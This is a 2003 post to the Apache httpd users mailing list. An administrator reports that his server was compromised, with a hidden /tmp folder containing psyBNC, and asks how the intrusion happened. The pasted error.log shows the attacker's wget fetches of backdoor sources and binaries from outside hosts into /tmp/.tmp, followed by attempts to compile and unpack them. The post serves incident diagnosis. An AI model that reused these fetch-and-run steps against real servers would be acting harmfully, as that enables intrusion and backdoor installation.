httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Randy McMillan" <ra...@pacinfo.com>
Subject [users@httpd] hacker access shown in error.log
Date Thu, 02 Oct 2003 17:00:39 GMT
I found a hidden folder in my /tmp folder with the psybnc program(s) in it.
It was owned by the www user.  I was looking in the apache logs and found
the example below in the error.log.  It appears as if they can upload files
to the /tmp folder and have shell access as the www user through the web
server but I don't know how.   There doesn't seem to be anything out of the
ordinary in the access.log or just prior in the error_log.  They also try to
get various "ptrace" programs but the kernel is patched for that.

I was running version 2.0.47, and I just upgraded php to 4.3.3 from 4.3.2
and did the recent openssl update.  If it is not related to the updates I
just did, then it would seem to be a configuration issue and I could use
some hints.  I googled some of the program names, but didn't come up with
anything specific.

Thanks
Randy
PacInfo


======== examples of uploads =====================
--16:42:23--  http://members.xoom.it/merlotx/back.c
           => `/tmp/.tmp/backwget.c'
Resolving members.xoom.it... done.
Connecting to members.xoom.it[62.211.66.53]:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://members.xoom.virgilio.it/merlotx/back.c [following]
--16:42:24--  http://members.xoom.virgilio.it/merlotx/back.c
           => `/tmp/.tmp/backwget.c'
Resolving members.xoom.virgilio.it... done.
Connecting to members.xoom.virgilio.it[62.211.66.12]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,282 [text/plain]

    0K .                                                     100%    1.22
MB/s

16:42:24 (1.22 MB/s) - `/tmp/.tmp/backwget.c' saved [1282/1282]

--16:42:24--  http://members.xoom.it/merlotx/bd
           => `/tmp/.tmp/bd'
Resolving members.xoom.it... done.
Connecting to members.xoom.it[62.211.66.51]:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://members.xoom.virgilio.it/merlotx/bd [following]
--16:42:25--  http://members.xoom.virgilio.it/merlotx/bd
           => `/tmp/.tmp/bd'
Resolving members.xoom.virgilio.it... done.
Connecting to members.xoom.virgilio.it[62.211.66.55]:80... connected.
HTTP request sent, awaiting response... mkdir: cannot create directory
`/tmp/.tmp': File exists
--16:42:25--  http://members.xoom.it/merlotx/back.c
           => `/tmp/.tmp/backwget.c'
Resolving members.xoom.it... done.
Connecting to members.xoom.it[62.211.66.56]:80... 200 OK
Length: 14,437 [text/plain]

    0K ..connected.
HTTP request sent, awaiting response... ......302 Found
Location: http://members.xoom.virgilio.it/merlotx/back.c [following]
--16:42:26--  http://members.xoom.virgilio.it/merlotx/back.c
           => `/tmp/.tmp/backwget.c'
Resolving members.xoom.virgilio.it... done.
Connecting to members.xoom.virgilio.it[62.211.66.55]:80... .. ....
$

16:42:26 (29.74 KB/s) - `/tmp/.tmp/bd' saved [14437/14437]

--16:42:26--  http://members.xoom.it/merlotx/back20.c
           => `/tmp/.tmp/back30.c'
Resolving members.xoom.it... done.

============== after getting several program there is this kind of stuff
=================
/tmp: Is a directory
/tmp/.tmp/back20.c:1: parse error before `/'
/tmp/.tmp/backlyn.c:1: parse error before `/'
/tmp/.tmp/back20.c:1: parse error before `/'
gunzip: psyBNC2.2.1-linux-i86-static.tar.gz: No such file or directory
gunzip: psyBNC2.2.1-linux-i86-static.tar.gz: No such file or directory
tar: v: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: v: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
sh: cd: /tmp/psybnc/: No such file or directory
sh: cd: /tmp/psybnc/: No such file or directory
--16:42:33--  http://members.xoom.virgilio.it/badangel/psy.conf
           => `/tmp/psybnc'
Resolving members.xoom.virgilio.it... --16:42:33-- 
http://members.xoom.virgilio.it/badangel/ps$
           => `/tmp/psybnc'
Resolving members.xoom.virgilio.it... done.
Connecting to members.xoom.virgilio.it[62.211.66.15]:80... done.
Connecting to members.xoom.virgilio.it[62.211.66.52]:80... connected.
HTTP request sent, awaiting response... connected.
HTTP request sent, awaiting response... 200 OK
Length: 76 [text/plain]




---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message